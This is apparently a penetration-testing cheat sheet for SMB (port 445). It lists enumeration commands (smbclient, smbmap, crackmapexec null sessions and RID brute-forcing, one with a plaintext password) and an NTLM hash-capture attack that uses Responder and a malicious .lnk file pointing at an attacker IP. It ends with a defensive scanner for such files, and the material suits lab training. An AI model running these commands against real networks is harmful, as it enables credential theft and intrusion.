Samba / SMB (445)

Enumeration

enum4linux

enum4linux-ng -A $IP # also run the original: enum4linux -A $IP

smbclient

smbclient -L 10.10.113.122 -U 'svc-admin' # -p sets the port, not a password; smbclient prompts for the password

smbclient //192.168.139.157/fox -U 'fox' # prompts for the password

smbmap

smbmap -H 192.168.149.157 -u 'fox' -p 'iparalipomenidellabatracomiomachia'

crackmapexec

crackmapexec smb $target # gives some initial info (OS, domain, signing)

crackmapexec smb $target -u '' -p '' # try a null session

crackmapexec smb $target -u 'guest' -p '' # can sometimes get some info

With a valid account:

crackmapexec smb $target -u $user -p $pass --shares

crackmapexec smb $target -u $user -p $pass -M spider_plus

crackmapexec smb $target -u $user -p $pass --rid-brute # may show other accounts

Exploitation

URI File Attack

If you can upload files to an SMB share, clients browsing that share may render the uploaded files' icons. If the browsing client is an Active Directory computer, you may be able to capture its NTLM hash during the icon loading attempt.

sudo responder -I tun0 -v

python2 /home/kali/tools/win/LNKUp/generate.py --host 192.168.49.187 --type ntlm --output link.lnk

You should now have the NTLMv2 hash, which you can crack with hashcat (-m 5600).
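From the defender's side, the artifact this leaves behind is a shortcut-type file on a writable share whose icon or target field points at a remote host. The scanner below is an added example, not from this page or any tool it names; the host names and sample bytes are constructed placeholders, and the sample is only the string data such a file would carry, not a complete shortcut file.

```python
"""Added example: hunt shortcut-type files on a share that point at a remote host.

Explorer resolves these files' icon/target fields when a folder is listed, so a
UNC path in them makes the browsing client authenticate to that host. Flagging
such files on writable shares is the defender's counterpart to the attack above.
"""
from __future__ import annotations

import re
from pathlib import Path

# File types whose icon/target fields Explorer resolves while listing a folder.
SHORTCUT_SUFFIXES = {".lnk", ".url", ".scf", ".library-ms"}

# \\host\share\... ; .lnk stores strings as UTF-16LE, .url/.scf as 8-bit text,
# so the raw bytes are decoded both ways before matching.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\[^\x00\r\n"<>|]*')


def find_unc_refs(data: bytes) -> list[str]:
    """Return the distinct UNC paths found in a file's raw bytes."""
    texts = (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore"))
    return sorted({m.group(0) for text in texts for m in UNC_RE.finditer(text)})


def scan_share(root: Path) -> dict[str, list[str]]:
    """Walk a mounted share and map each suspicious shortcut file to its UNC refs."""
    findings: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SHORTCUT_SUFFIXES:
            refs = find_unc_refs(path.read_bytes())
            if refs:
                findings[str(path.relative_to(root))] = refs
    return findings


# Constructed sample: the UTF-16LE string data a .lnk would carry for a remote
# icon location (placeholder host; not a real or complete .lnk file).
SAMPLE_LNK_STRING = "\\\\FILESERVER-PLACEHOLDER\\icons\\app.ico".encode("utf-16-le")
# Constructed benign sample: a local icon path raises no finding.
SAMPLE_LOCAL_STRING = "C:\\Windows\\System32\\shell32.dll".encode("utf-16-le")

if __name__ == "__main__":
    import sys
    print(find_unc_refs(SAMPLE_LNK_STRING))    # remote ref -> flagged
    print(find_unc_refs(SAMPLE_LOCAL_STRING))  # local path -> []
    if len(sys.argv) > 1:                      # e.g. the mount point of a share
        for name, refs in scan_share(Path(sys.argv[1])).items():
            print(f"{name}: {', '.join(refs)}")
```

Run it against a mount point of the share (for example after `mount -t cifs`) to list files that would trigger outbound authentication when browsed; hits on a share where users do not normally store shortcuts deserve a look.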
